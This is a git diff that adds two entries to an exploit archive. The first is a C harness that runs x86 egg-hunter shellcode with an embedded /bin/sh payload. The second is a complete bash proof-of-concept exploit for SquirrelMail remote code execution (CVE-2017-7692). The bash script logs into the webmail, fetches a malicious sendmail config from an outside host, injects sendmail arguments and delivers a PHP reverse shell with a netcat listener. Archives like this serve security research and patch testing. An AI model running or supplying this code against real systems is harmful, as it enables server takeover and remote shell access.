diff --git a/files.csv b/files.csv index b1392ae14..d404872e6 100644 --- a/files.csv +++ b/files.csv @@ -15460,6 +15460,7 @@ id,file,description,date,author,platform,type,port 41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0 +41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16094,6 +16095,7 @@ id,file,description,date,author,platform,type,port 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0 +41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/lin_x86/shellcode/41909.c b/platforms/lin_x86/shellcode/41909.c new file mode 100755 index 000000000..1cd4f2326 --- /dev/null +++ b/platforms/lin_x86/shellcode/41909.c @@ -0,0 +1,48 @@ +// Description: a 18 bytes egg hunter on contigous memory segments +// +// You are free to do whatever you want of this shellcode +// +// @phackt_ul +/* +global _start + +section .text +_start: + + mov eax, _start ; we set a valid .text address into eax + mov ebx, dword 0x50905091 ; we can avoid an 8 bytes tag in egg if the tag + dec ebx ; can not be found in the egg hunter, that's why we decrement to look for + ; 0x50905090 - push eax, nop, push eax, nop + +next_addr: + + inc eax + cmp dword [eax], ebx ; do we found the tag ? + jne next_addr + jmp eax ; yes we do so we jump to the egg +*/ +#include +#include + +unsigned char egghunter[] = \ +"\xb8\x60\x80\x04\x08\xbb\x91\x50\x90\x50\x4b\x40\x39\x18\x75\xfb\xff\xe0"; + +unsigned char egg[] = \ +"\x90\x50\x90\x50" // egg mark - do not remove +"\xbd\x64\xb2\x0c\xf4\xda\xc2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" // msfvenom -p linux/x86/exec CMD=/bin/sh -f c -b \x00 +"\x0b\x83\xc2\x04\x31\x6a\x11\x03\x6a\x11\xe2\x91\xd8\x07\xac" +"\xc0\x4f\x7e\x24\xdf\x0c\xf7\x53\x77\xfc\x74\xf4\x87\x6a\x54" +"\x66\xee\x04\x23\x85\xa2\x30\x3b\x4a\x42\xc1\x13\x28\x2b\xaf" +"\x44\xdf\xc3\x2f\xcc\x4c\x9a\xd1\x3f\xf2"; + +void main() +{ + + printf("Egg hunter shellcode Length: %d\n", strlen(egghunter)); + printf("Egg shellcode Length: %d\n", strlen(egg)); + + int (*ret)() = (int(*)())egghunter; + + ret(); + +} diff --git a/platforms/linux/remote/41910.sh b/platforms/linux/remote/41910.sh new file mode 100755 index 000000000..1aeb0f5ed --- /dev/null +++ b/platforms/linux/remote/41910.sh @@ -0,0 +1,194 @@ +#!/bin/bash +# +int='\033[94m + __ __ __ __ __ + / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ + / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ + / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) + /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ + /____/ + +SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) + +SquirrelMail_RCE_exploit.sh (ver. 1.0) + +Discovered and coded by + +Dawid Golunski (@dawid_golunski) +https://legalhackers.com + +ExploitBox project: +https://ExploitBox.io + +\033[0m' + +# Quick and messy PoC for SquirrelMail webmail application. +# It contains payloads for 2 vectors: +# * File Write +# * RCE +# It requires user credentials and that SquirrelMail uses +# Sendmail method as email delivery transport +# +# +# Full advisory URL: +# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html +# Exploit URL: +# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh +# +# Tested on: # Ubuntu 16.04 +# squirrelmail package version: +# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 +# +# Disclaimer: +# For testing purposes only +# +# +# ----------------------------------------------------------------- +# +# Interested in vulns/exploitation? +# Stay tuned for my new project - ExploitBox +# +# .;lc' +# .,cdkkOOOko;. +# .,lxxkkkkOOOO000Ol' +# .':oxxxxxkkkkOOOO0000KK0x:' +# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. +# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. +# '';ldxxxxxdc,. ,oOXXXNNNXd;,. +# .ddc;,,:c;. ,c: .cxxc:;:ox: +# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: +# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: +# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: +# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: +# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: +# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: +# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: +# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: +# .dxxxxxdl;. ., .. .;cdxxxxxx: +# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: +# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. +# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. +# .':oxxxxxxxxx.ckkkkkkkkxl,. +# .,cdxxxxx.ckkkkkxc. +# .':odx.ckxl,. +# .,.'. +# +# https://ExploitBox.io +# +# https://twitter.com/Exploit_Box +# +# ----------------------------------------------------------------- + +sqspool="/var/spool/squirrelmail/attach/" + +echo -e "$int" +#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n" +#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n" +#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n" + + +# Base URL +if [ $# -ne 1 ]; then + echo -e "Usage: \n$0 SquirrelMail_URL" + echo -e "Example: \n$0 http://target/squirrelmail/ \n" + + exit 2 +fi +URL="$1" + +# Log in +echo -e "\n[*] Enter SquirrelMail user credentials" +read -p "user: " squser +read -sp "pass: " sqpass + +echo -e "\n\n[*] Logging in to SquirrelMail at $URL" +curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect +if [ $? -eq 0 ]; then + echo "Invalid creds" + exit 2 +fi +sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" +keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`" + + +# Prepare Sendmail cnf +# +# * The config will launch php via the following stanza: +# +# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, +# T=DNS/RFC822/X-Unix, +# A=php -- $u $h ${client_addr} +# +wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf + +# Upload config +echo -e "\n\n[*] Uploading Sendmail config" +token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" +attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`" +if [ ${#attachid} -lt 32 ]; then + echo "Something went wrong. Failed to upload the sendmail file." + exit 2 +fi + +# Create Sendmail cmd string according to selected payload +echo -e "\n\n[?] Select payload\n" +# SELECT PAYLOAD +echo "1 - File write (into /tmp/sqpoc)" +echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)" +echo +read -p "[1-2] " pchoice + +case $pchoice in + 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc" + ;; + + 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid" + ;; +esac + +if [ $pchoice -eq 2 ]; then + echo + read -p "Reverese shell IP: " reverse_ip + read -p "Reverese shell PORT: " reverse_port +fi + +# Reverse shell code +phprevsh=" +/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\"; + file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd); + system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\"); +?>" + + +# Set sendmail params in user settings +echo -e "\n[*] Injecting Sendmail command parameters" +token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `" +curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null +if [ $? -ne 0 ]; then + echo "Failed to inject sendmail parameters" + exit 2 +fi + +# Send email which triggers the RCE vuln and runs phprevsh +echo -e "\n[*] Sending the email to trigger the vuln" +(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \ +-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) & + +if [ $pchoice -eq 2 ]; then + echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port" + nc -vv -l -p $reverse_port +else + echo -e "\n[*] The test file should have been written at /tmp/sqpoc" +fi + +grep -q "302 Found" /tmp/sheaders +if [ $? -eq 1 ]; then + echo "There was a problem with sending email" + exit 2 +fi + + +# Done +echo -e "\n[*] All done. Exiting" +